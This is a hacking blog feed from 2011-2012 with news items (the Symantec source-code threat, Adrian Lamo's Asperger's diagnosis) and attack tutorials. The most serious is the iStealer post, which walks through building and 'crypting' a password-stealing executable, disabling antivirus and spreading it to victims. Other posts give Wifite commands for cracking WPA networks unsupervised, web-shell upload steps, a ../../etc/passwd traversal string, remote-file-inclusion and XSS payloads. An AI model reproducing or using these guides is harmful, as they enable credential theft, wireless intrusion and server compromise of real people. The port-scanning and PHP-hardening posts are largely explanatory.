Defend Hackers, Secure The World

Indian Hacker group threatens Symantec to release AV source code

noreply@blogger.com (h4ckfreak) — Sat, 07 Jan 2012 08:36:00 +0000

Symantec is investigating an Indian hacking group's claims that it accessed source code used in the company's flagship Norton Antivirus program.

A spokesman for the company on Thursday said that one claim by the group was false, while another is still being investigated.
Meanwhile, the Indian group, which calls itself Lords of Dharmaraja, has threatened to publicly disclose the source code shortly.

On Wednesday, the group posted on Pastebin what it claimed was confidential documentation related to Norton AntiVirus source code. A review of the material showed what appears to be a description of an application programming interface (API) for Symantec's AV product.
The group also posted what it claimed was the complete source code tree file for Norton Antivirus. That document appears to have been taken down.

'Yama Tough,' the hacker who posted the documents, released at least two more on Google+ allegedly related to Symantec source code. One of the documents appears to be a detailed technical overview of Norton Anti-Virus,

The document explains how the software is designed to work, but includes no actual source code, the spokesman said.
"However, a second claim has been made by the same group regarding additional source code and we're currently investigating that," he said. "For that one, we don't have any information to provide as of yet." the spokesman said.
Rob Rachwald, director of security strategy at security vendor Imperva said it is hard to know what to make of the hacking group's claims.
"We don't know how much of this is chest thumping" on the part of the hackers, Rachwald said. The source code tree file posted on Pastebin suggests the group has some potentially useful information related to Symantec's AV product, he said. "It is a good indicator, but not a perfect one.

Crack WPA/WPA2 Using Wifite - Latest

noreply@blogger.com (h4ckfreak) — Sun, 01 Jan 2012 17:03:00 +0000

purpose

to attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments. wifite can be trusted to run without supervision.

features

this project is available in French: all thanks goto Matt² for his excellent translation!
sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all WPA handshakes are backed up to wifite.py's current directory
smart WPA deauthentication -- cycles between all clients and broadcast deauths
stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
switching WEP attack methods does not reset IVs
intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
SKA support (untested)
displays session summary at exit; shows any cracked keys
all passwords saved to log.txt
built-in updater: ./wifite.py -upgrade

requirements

linux operating system (confirmed working on Ubuntu 8.10 (BT4R1), Ubuntu 10.04.1)
tested working with python 2.4.5 and python 2.5.2; might be compatible with other versions,
wireless drivers patched for monitor mode and injection: backtrack4 has many pre-patched drivers,
aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or by clicking here,
xterm, python-tk module: required for GUI, available via apt: apt-get install python-tk
macchanger: also available via apt: apt-get install macchanger
pyrit: not required, optionally strips wpa handshake from .cap files

execution

download the latest version:

wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

change permissions to executable:

chmod +x wifite.py

execute:

python wifite.py

or, to see a list of commands with info:

./wifite.py -help

snapshot

console mode:

gui mode (default):

examples

the program contains lots of interactivity (waits for user input). these command-line options are meant to make the program 100% automated -- no supervision required.
to crack all WEP access points:

./wifite.py -all -nowpa

to crack all WEP access points with signal strength greater than (or equal to) 50dB:

./wifite.py -p 50 -nowpa

to attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:

./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst

to attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically:

./wifite.py -all -nowpa --dict none

to crack all WEP access points greater than 50dB in strength, giving 15 minutes for each WEP attack method, and send packets at 600 packets/sec:

./wifite.py --power 50 -wepw 15 -pps 600

to attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrrupts with ^C):

./wifite.py -e "2WIRE752" -wepw 0

thanks to google code

Basics of Arbitary File Upload

noreply@blogger.com (h4ckfreak) — Mon, 19 Dec 2011 21:57:00 +0000

As the name suggests Arbitrary File Upload Vulnerabilities is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.

The main danger of these kind of vulnerabilities is that the attacker can upload a malicious PHP , ASP etc. script and execute it. The main idea is to get the access to the server and execute desired code. for example an Attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and the victim’s server gets owned.

In this tutorial we’ll be looking at a a basic example of a Vulnerable Script and How to exploit it. So let’s get started.

Proof of Concept

For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php

Code:

<?php
   
  /**
   * @author lionaneesh
   * @copyright 2011
   * @page upload.php
   */
   
  // If the upload request has been made , Upload the file
   
  $uploadMessage = "";
   
  if (isset($_POST['upload']))
  {
        $path = $_FILES['uploadFile']['name'];
        if(move_uploaded_file($_FILES['uploadFile']['tmp_name'],$path) == TRUE)
        {
              $uploadMessage = "File Uploaded <a href='$path'>HERE</a>";
        }
  }
   
  ?>
   
  <html>
   
  <head>
   
      <title>Welcome to Vulnerable Apps</title>
   
  </head>
   
  <body>
   
  <h1>Arbitary file upload ( POC )</h1>
  <hr />
   
  <p>Hey all this is a sample php script to upload image files , This script doesn't contains file type checking code which makes it prone to Arbitary file upload vulnerbility. </p>
   
  <hr />
  <h2>Upload</h2>
  <hr />
   
  <table>
  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
      <tr>
      
          <td width="100">Upload File </td>
          <td width="380"><input class="cmd" type="file" name="uploadFile"/></td>
          <td><input style="margin-left:20px;" type="submit" name="upload" class="own" value="Upload"/></td>
      
      </tr>
  </form>
  </table>
  <?php
   
  echo $uploadMessage;
   
  ?>
   
  </body>
   
  </html>

In the above script we simply ask the user to input the file to be uploaded and without even checking what the file-type is or its extension we upload it.

This is a basic example of how these bugs occur.

How to exploit it

Now to exploit this common bug is yet simpler, the hacker can simply download any Web Shell-Scripts , Written in PHP , ASP etc.

Some PHP Shells :-

Ani-Shell
[ R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the hacker have to carry out some steps :-

Upload the Shell

Go to the link

Gain Access

That's it for this tutorial stay tuned for more.

Tell the World ...

Basics of LFI and RFI Attacks

noreply@blogger.com (h4ckfreak) — Mon, 19 Dec 2011 21:54:00 +0000

Local File Inclusion ( LFI ) is a method of including files on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like , include() , require() etc.) . Mostly these attacks are accompanied by Directory Transversal attacks which can reveal some sensitive data leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]

I have created a pair of files named index.html and lfi.php
lfi.php

Code:

<html>
   <head>
   <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>   
  <body>
   
   <h1>Welcome to this Website</h1>
   
  <?php $page = isset($_GET['page']) ? $_GET['page'] : 'index.html'; ?>
   
   <p>You are currently at <?php echo"<a href='$page'>$page</a>";?></p>
   
   <?php include($page); ?>
   </body>
  </html>

As you see the above code has a include(USER_INPUT) So basically we can input any filename and it will simply print out the contents on the screen. This is the most popular form in which these bugs occur.
index.html

Code:

<p>Hello I am a sample page my name is index.html</p>

Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-

Code:

Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html

It works fine! Now let’s construct the attack string and see what happens!

Constructing the attack string

As I am working on UNIX we’ll print out the contents of /etc/passwd file , The file /etc/passwd is a local source of information about users' accounts.

My present working directory is /var/www/ , So what I have to do is :-

Go back 2 directories and
Then go to /etc/passwd

We can go back 2 directories using ‘../../’

Attack string :-

Code:

../../etc/passwd

Now lets feed this as an input and see what happens.

Input: “ ../../etc/passwd”

Code:

Welcome to this Website

  You are currently at ../../etc/passwd 
  root:x:0:1:Super-User:/root:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/

And voila! We just printed the /etc/passwd file.

Remote File Inclusion

RFI is an abbreviation for Remove File Inclusion and is quite similar to LFI, Remote File Inclusion ( RFI ) is a method of including Remote files(present on another server) on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like, include (), require () etc.)

Demonstration [Proof of Concept]

We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert’s index file in our local file.

So what we have to do is, simply provide the URI as an input and see what happens

Input : http://go4expert.com

Output (page source):-

Code:

<html>
<head>
                       <title>Vulnerable to LFI -- by lionaneesh</title>
 </head>

 <body>

 <h1>Welcome to this Website</h1>

  <p>You are currently at <a href='http://go4expert.com'>http://go4expert.com</a>

</p> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>         <meta http-equiv="Cache-Control" content="no-cache" />        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />  
<title>Programming and SEO Forums </title> 

<!-- ChartBeat -->

<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<!-- /ChartBeat --> 

 --------Sniped-----------

Note: In most modern ‘php.ini’ files, allow_url_include is set to off which would not allow a malicious user to include a remote file.

Basics of XSS, How the Logic Works

noreply@blogger.com (h4ckfreak) — Mon, 19 Dec 2011 21:45:00 +0000

Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS

This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo

Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php

Code: php

<html>
<head>
    <title>Vulnerable to XSS</title>
</head>
</html>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
 * @author lionaneesh
 * @copyright 2011
 */
 

if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}

echo "<i>$data</i>";

?>

</body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them

If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php

echo htmlspecialchars("<i>$data</i>");

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

That’s all for this tutorial stay tuned for more

For advanced reading click here

Thanks,

Greyhat

Obfuscating PHP

noreply@blogger.com (h4ckfreak) — Mon, 19 Dec 2011 21:36:00 +0000

I must say that hiding or obfuscating is not the most effective ways of security but it’s still effective to keep a Script Kiddy confused about what actually you are using in your server.

As an example - Server may use vulnerable version of PHP, with a public exploit released at some underground markets, Most of the time a simple automated exploit is released to help the “Point-Click-Hackers” (Script Kiddies). Now all they have to find is which Version of PHP you are using and if it is vulnerable, Point the exploit, launch it and own your system. In these cases obfuscating can really help you a lot.

By PHP obfuscation you can hide PHP, Which means you can stop or slow down a hacker attacking your machine.

In this tutorial, we’ll be looking at some of the most popular methods used by Site Administrators to Hide PHP , So let’s get started.

Editing php.ini file

PHP as a default exposes the fact that if it is installed on a server or not, by adding its signature to the Web server header which can really be lethal in some cases.

To set this off , Simply go to your php installation directory under “conf_files” , you can find your standard PHP Configuration file named “php.ini”

Now under this file , go to the “Miscellaneous” section and simply turn expose_php to Off.

Spoofing

By adding a simple line of code you can actually fool an attacker about what service are you using.

Spoof.php

Code: php

<?php
error_reporting(0);
header("X-Powered-By: My Programming Language");
?>

Note: The header call should be made before you send any data to the client.

Using Some Basic Apache Rules

Most Web servers like Apache etc. Can be configured to use some basic rules that would allow to parse different file-types with PHP.

EG:-

A file like index.php, gives a straight clue to the attacker that the server is using php. But if we can use some basic server configuration to actually allow a extension like “.mpl” etc to parse PHP code. The attacker will certainly have no clue about the file extension.

For the Scope of this tutorial I’ll only be covering some Apache Rules/Configurations, but if you need help with some other servers, feel free to comment or PM me.

The configurations can be added either using the .htaccess directive or directly through the Apache Configurations file. Just add the following set of rules

Syntax :-

Code:

AddType application/x-httpd-php .extenstion

Example :-

Code:

AddType application/x-httpd-php .mpl .mp3 .py .asp

Note : Only use those extensions which are normally not used by the server , for example don’t use .txt extension as the server will interpret .txt as PHP code and if it contains some php , it will be executed.

Conclusion

Obfuscation is not the most effective way of security and at most of the times, it doesn’t help, as a professional hacker would already know these modifications and can easily make out what you are trying to hide. But obfuscation would really slow down the attacker and will keep away some script kiddies. It is better to obfuscate than rather telling him what he wants.

The GREAT FIRE"WALL" Of China

noreply@blogger.com (h4ckfreak) — Tue, 13 Dec 2011 12:00:00 +0000

Hack Passwords Using iStealer

noreply@blogger.com (h4ckfreak) — Mon, 12 Dec 2011 14:03:00 +0000

There are diffirent way's to steal passwords.
I want to be able to steal passwords from cookie files with 1 click,

well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.

I'll set one up, and will go thru all the details.

Prepare yourself

1st Download iStealer 6.0 ( link is at the bottom of the thread )

2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )

3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.

The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )

Now create a new database and user. Something like this

MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.

Configure to steal

Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.

you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it

$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name

$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page

Configure this with you own MySQL database information. Then it should look like this

$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name

$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page

Note that the $username and $password variable will be used to log in your website, so choose it carefully.

Now save the file.

Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css

Upload it.

Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.

Making the Stealer File!

Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).

Click build!

Testing, crypting, spreading?

Testing?

To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!

Crypting?

Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirusscanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!

Spreading?

Just make a torrent file with your File in it ( With a combine tool - Google it ).
Or just go to the computer of your friends, shut down their antivirus ( if your file isn't crypted ), and click the file.

Dont spread, it's illegal.

If the link broken , Google for iStealer 6.0 (Files tube Or Mediafire)

Types Of Port Scanning , Reference

noreply@blogger.com (h4ckfreak) — Mon, 12 Dec 2011 13:49:00 +0000

Port numbers are 16-bit unsigned numbers and can be broadly classified into three categories.

Port 0-1023 is "well known ports",
1024 - 49151 are "registered ports"
and 49152 - 65535 is "dynamic or private ports".

One problem with port scanning is that it is effortlessly logged by the services listening at the scanned ports. This is because they detect an incoming connection, but do not receive any data, thereby generating an application error log.

To scan UDP ports, an empty UDP datagram is sent to the port. If the port is listening, the services will send back an error message or ignore the incoming datagram. If the port is closed, the operating system send back "ICMP Port Unreachable" (Type 3) message.

(Remember Windows Uses ICMP To find the Host is alive Or Dead , Linux Uses UDP packets to do the same)

Port scanning can be broadly classified into:

Open scan
Half-open scan
Stealth scan
Sweeps
Misc

If ur a Beginner u may be wondering What ype of scan can i go for ??It Completely depends on the information gathering during reconnaissance regarding the type of network topology, IDS and other logging feature present on the system.

So to be in the Safer Side i have got some links which tells u the logic Behind Each type of Scan , Click Here to Know the Packet Informations

Open Scan

Open scan / TCP connect scan also known as vanilla scan where a full connection is opened to the target system by a three-way TCP/IP handshake. Therefore, it is easiest to be detected and blocked on the network. However the information gathering using open scan is usually the most.
When the port is open, the client sends a SYN flag, the server replies a SYN+ACK flag, which is acknowledged back with an ACK flag by client. Once the handshaking is completed, the connection is terminated by the client. This confirm an open port.
When the port is closed or "not listening" the server response a RST+ACK flag, which is acknowledged back with an RST flag by client, and then the connection is closed.
The disadvantage of this scan technique is that the attacker cannot spoof his identity as spoofing would require sending a correct sequence number as well as setting the appropriate return flags to setup data connection. Moreover, most stately IDS and firewall detect and log this scan, exposing both the attempt and the attacker's IP. The advantage is fast accurate scan that require no additional privilege.

Half-Open Scan

In half-open scan, a complete TCP connection is not established. Instead as soon as the server acknowledge with a SYN+ACK response, the client tears down the connection by sending RST flag. This way, the attacker detect an open port and not establish full connection.

However, some sophisticated IDS and firewall can detect a SYN packet from the void and prevent such scan. Besides, this scan require attacker to make a customer IP packet which in turn requires access to SOCK_RAW (getprotbyname('raw') under most system) or /dev/bpf (Berkeley packet filter), /dev/nit (Sun network interface tap). This requires priviliege access.

Stealth Scan

Initially half open scans were considered stealth, however as IDS software evolved, these scan were easily logged. Now, stealth scan refers to the type of scan where packets are flagged with a particular set of flags other than SYN, or a combination of flags, no flag set, with all flag set, appearing as normal traffic, using fragmented packet or avoiding filtering devices by any other means. All these techniques resort to inverse mapping to determine open ports.

SYN|ACK Scan
Client sends a SYN+ACK flag to the target. For a closed port, server will reply a RST response while an open port will not reply. This is because the TCP protocol requires a SYN flag to initiate the connection. This scan may generate certain amount of false positives. For instance, packets dropped by filtering devices, network traffic, timeouts etc can give a wrong inference of an open port while the port may or may not be open. However this is a fast scan that avoid three-way handshake.
FIN Scan
Similar to SNY|ACK scan, instead a FIN flag is sent to the target. The closed ports are required to reply to the probe packet with RST, while open ports must ignore the packet in question. This scan attempt to exploit vulnerabilities in BSD code. Since most OS are based on BSD or derived from BSD, this was a scan that can return good result. However, most OS applied patches to correct the problem, still there remains a possibility that the attacker may come across one where these patches have not be applied.
ACK Scan
The scan take advantage of the IP routing function to deduce the state of the port from the TTL value. This is based on the fact that IP function is a routing function. Therefore TTL value will be decremented by on by an interface when the IP packet passes through it.
NULL Scan
In NULL scan, the packet is sent without any flag set. This takes advantage of RFC 793 as the RFC does not specify how the system should respond. Most UNIX and UNIX related system respond with a RST (if the port is open) to close the connection. However, Microsoft's implementation does not abide with this standard and reacts differently to such scan. An attacker can use this to differentiate between a Windows machine and others by collaborating with other scan results. For example, if -sF, -sX or -sN scan shows all ports are closed, but a SYN (-sS) scan shows ports are opened, the attacker can infer that he is scanning a windows machine. This is not an exclusive property though, as this behavior is also shown by Cisco, BSDI, HP/UX, MVS and IRIX. Also note that the reserved bits (RES1, RES2) do not affect the result of any scan. Therefore this scan will work only with UNIX and related systems.
Xmas Scan
In Xmas scan, all flags are set. All the available flags in the TCP header are set (ACK, FIN, RST, SYN, URG, PSH) to give the scan an ornamental look. This scan will work on UNIX and related systems and cause the kernel to drop the packet if the receiving port is open.
TCP Fragmenting
This approach is evolved from the need to avoid false positive arising from other scans due to packet filtering device. For any transmission, a minimally allowable fragmented TCP header must contain a destination and source port for the first packet (8 octet, 64 bit), the initialized flags in the next, which allows the remote host to reassemble the packet upon receipt through an internet protocol module that identifies the fragmented packets by the field equivalent values of source, destination, protocol and identification.
The scan works by splitting the TCP header into small fragments and transmitting it over the network. However, there is a possibility that IP reassembly on the server-side may result in unpredictable and abnormal results - such as fragmentation of the data in the IP header. Some hosts may be incapable of parsing and reassembling the fragmented packets and thus may cause crashes, reboots or even network device monitoring dumps.
Some firewalls may have rulesets that block IP fragmentation queues in the kernel (like the CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel) - though this is not widely implemented due to the adverse affect on performance. Since several intrusion detection systems use signature-based mechanisms to signify scanning attempts based on IP and/or the TCP header, fragmentation is often able to evade this type of packet filtering and detection. There is a high possibility of causing network problems on the target network.

Miscellaneous

FTP bounce
This scan takes advantage of the FTP servers with read/write access. The advantage of this scan can be both anonymity and accessibility. Suppose the target network allows FTP data transfer from only its recognized partners. An attacker might discover a service business partner who has a FTP service running with a world-writable directory that any anonymous user can drop files into and read them back from. It could even be the ISP hosting services on its FTP server. The attacker, who has a FTP server and able to run in passive mode, logs in anonymously to the legitimate server and issues instructions for scanning or accessing the target server through a series of FTP commands. He may choose to make this into a batch file and execute it from the legitimate server to avoid detection.
If a connection is established as a means of active data transfer processing (DTP), the client knows a port is open, with a 150 and 226 response issued by the server. If the transfer fails a 425 error will be generated with a refused build data message. The PASV listener connection can be opened on any machine that grants a file write access to the attacker and used to bounce the scan attack for anonymity. It does not even have to be an FTP server, any utility that will listen on a known TCP port and read raw data from it into a file will do.
Often these scan are executed as batch files padded with junk so that the TCP windows are full and the connection stay alive long enough for the attacker to execute this commands. Fingerprinting the OS scan help determine the TCP window size and allow the attacker to pad this commands for further access accordingly.
This scan is hard to trace, permits access to local network and evades firewalls. However, most FTP servers have patched this vulnerability by adopting countermeasures such as preventing third party connection and disallowing listing of restricted ports. Another measure adopted has been restrict write access.
UDP scan
The disadvantage to the attacker is that UDP is a connectionless protocol and unlike TCP does not retransmit packet if they are lost or dropped on the network. Moreover, it is easily detected and unreliable (false positive). Linux kernel limit ICMP error message rates with destination unreachable set to 80 per 4 seconds, thereafter implmenting a 1/4 second penalty if the count is exceeded. This makes the scan slow and moreover the scan requires root access. However it avoids TCP based IDS and can scan non-TCP ports.

Ethical Hacker and Scanning Tools
The most important is knowledge itself. The result of a scanner can be misleading if the ethical hacker does not have good knowledge of common vulnerabilities. Relying solely on the scanning tool to all threats is not practical as the author of the vulnerability check may have written it incorrectly. It is also likely that it was created in a controlled environment and might not work as well in the open.
Besides, performing exhaustive scan against the system in a large enterprise is usually not feasible due to network constraints, stability of the backbone and scanned systems. Another view point is that scanner does not have an internal view of the host audited and can miss critical misconfiguration that result in an insecure setup, but appear "secure" from the outside with automation

Most Security Proffesional Has ASPERGER Syndrome, Even Adrian Lamo Has it

noreply@blogger.com (h4ckfreak) — Wed, 23 Nov 2011 11:39:00 +0000

Last month Adrian Lamo(Who is Adrian Lamo), a man once hunted by the FBI, did something contrary to his nature. He says he picked up a payphone outside a Northern California supermarket and called the cops.
Someone, Lamo says, had grabbed his backpack containing the prescription anti-depressants he’d been on since 2004, the year he pleaded guilty to hacking The New York Times. He wanted his medication back. But when the police arrived at the Safeway parking lot it was Lamo, not the missing backpack, that interested them. Something about his halting, monotone speech, perhaps slowed by his medication, got the officers’ attention.
An ambulance arrived. “After a few moments of conversation, they just kind of exchanged a look and told me to get on the stretcher,” says Lamo.

[Update : We've clarified the headline of this story, and modified the text to clearly attribute the above details to Lamo. Since reporting this story, we've learned from police that Lamo's initial hospitalization in April 2010 came after Lamo's father phoned the Sacramento County Sheriff's department three times in as many days to report that Lamo was over-medicating with his prescription drugs, which may have had a profound impact on his speech and coordination. The Sheriff's office was unable to find a record of Lamo phoning the police himself. Lamo stands by his original explanation of the incident.]
Thus began Lamo’s journey through California’s mental health system — and self discovery. He was transported to a local emergency room and put under guard, and then transferred to the Woodland Memorial Hospital near Sacramento, where he was placed on a 72-hour involuntary psychiatric hold under a state law allowing the temporary forced hospitalization of those judged dangerous or unable to care for themselves. As the staff evaluated him and adjusted his medication, a judicial officer extended his stay, and three days became nine.
When Lamo was finally discharged to his parents’ house on May 7, he left the hospital with a new diagnosis. At 29 years old Lamo learned he has Asperger’s Disorder.

“It’s kind of a surprise that it took me until almost 30 to find I had a particular disorder and get proper treatment for it,” Lamo says.

Sometimes called the “geek syndrome",(Click Me to Find More About Geek Syndrome)” Asperger’s is a mild form of autism that makes social interactions difficult, and can lead to obsessive, highly focused behavior.
There are no reliable figures on how many people have Asperger’s, but anecdotally a lot of them are drawn into the computer field, particularly the logic-heavy world of coding. BitTorrent creator Bram Cohen has diagnosed himself with the disorder, and Microsoft founder Bill Gates is frequently speculated to have it.
Also anecdotally, people with Asperger’s are frequently diagnosed in adulthood, even into their 50s, according to the U.S. Autism and Asperger’s Association. As in Lamo’s case, the diagnosis often follows a run-in with the police, says Dennis Debbaudt, an independent consultant who trains law enforcement agencies on interacting with people on the autistic spectrum.
“They may be living a life where people think they’re odd, they’re unusual, they’re eccentric, whatever you want to call it,” says Debbaudt. “But nobody’s thinking, ‘Oh, by the way, I think they have Asperger’s Syndrome.’ It’s not something that would pop into the mind of the general person or law enforcement. It’s just, ‘There’s something different here. This person communicates different. His body language is different.’”
The Asperger’s diagnosis, though, didn’t come as a complete surprise to Lamo or his family — the therapist Lamo had been seeing for depression had already suggested he visit a specialist to be evaluated for Asperger’s. Now, the new medication prescribed in Woodland has made a positive change in his interactions with other people.
“Talking to strangers was really hard for me,” Lamo says. “I had to script it all in my head and act out normal behaviors in a very conscious way. Essentially, I had to learn how human beings act.”

Adrian Lamo at the home of his parents in Carmichael, California, five days after his release from an involuntary psychiatric hold.

“Now I no longer feel there’s a surface tension that I have to break through when I talk to somebody, like I’m a fish going after a particularly tasty bug and I have to break through the water to get it,” he continues. “I just talk to somebody, like it’s a natural function.”
To a reporter who’s been covering Lamo for a decade, the diagnosis makes a layman’s instant, intuitive sense.
Lamo made his mark in the early 2000s with a string of brazen but mostly harmless hacks against large companies, conducted out in the open and with a striking naiveté as to the inevitable consequences for himself. In 2001, when he was 20, Lamo snuck into an unprotected content-management tool at Yahoo’s news site to tinker with a Reuters story, adding a made-up quote by then-Attorney General John Ashcroft.
Lamo’s other targets included WorldCom, Excite@Home and Microsoft; he alerted the press to each intrusion, and sometimes worked with the hacked company to close the security holes he’d exploited. Unemployed at the time, and prone to wander the country by Greyhound, he was given the appellation “the Homeless Hacker” by the media.
His hacking career ended around 2002, after Lamo penetrated the internal network of The New York Times and added himself to the paper’s database of op-ed contributors, putting himself in the virtual company of William F. Buckley Jr. and Jimmy Carter. The Times didn’t think it was funny, and the FBI and federal prosecutors in New York charged Lamo under the Computer Fraud and Abuse Act. He pleaded guilty in 2004, and was sentenced to six months of house arrest at his parents’ home in Carmichael, California, followed by two years of probation.
It was around that time that Lamo fell into a deep depression that has dogged him until last month. “I’d associated his depression with what had happened with the FBI,” says his father, Mario Lamo, who describes his son as having had a normal childhood. “As a child he would give speeches to people and entertain visitors and talk about a thousand things, and we didn’t notice anything irregular,” he says.
But as a teenager, Lamo began struggling in social situations. Since his discharge from Woodland, “I’ve noticed an incredible difference,” says the senior Lamo.
Lamo joins a growing list of computer intruders who’ve been diagnosed with Asperger’s, though usually the diagnosis comes when the hacker faces the criminal justice system for the first time, rather than six years later.
In December, a defense psychiatrist concluded that credit card thief Albert Gonzalez exhibited behavior consistent with Asperger’s. A government-appointed psychiatrist rejected the claim, and Gonzalez got 20 years. Earlier, in August, a Los Angeles computer intruder involved in a lucrative fraud scheme received a slightly reduced sentence because of his Asperger’s, which his lawyer argued made him vulnerable to manipulation by the ringleader in the scheme.
In the most high-profile case, the British hacker Gary McKinnon was diagnosed with Asperger’s at the age of 42, shortly after losing a legal challenge to an extradition order that would have sent him to America to face charges of sabotaging unclassified Pentagon computers. The diagnosis opened new legal avenues for McKinnon, who now appears likely to avoid extradition.
For his part, Lamo thinks Asperger’s might explain his knack for slipping into corporate networks — he usually operated with little more than a web browser and a lot of hunch work. “I have always maintained that what I did isn’t necessarily technical, it’s about seeing things differently,” he says. “So if my brain is wired differently, that makes sense.”
But he scoffs at the notion that Asperger’s should mitigate the consequences of illegal behavior. Asperger’s might help explain his success in hacking, but not his willingness to do it, he says. “If, in fact, the diagnosis is accurate, it had zip to do with my actions at that time.”
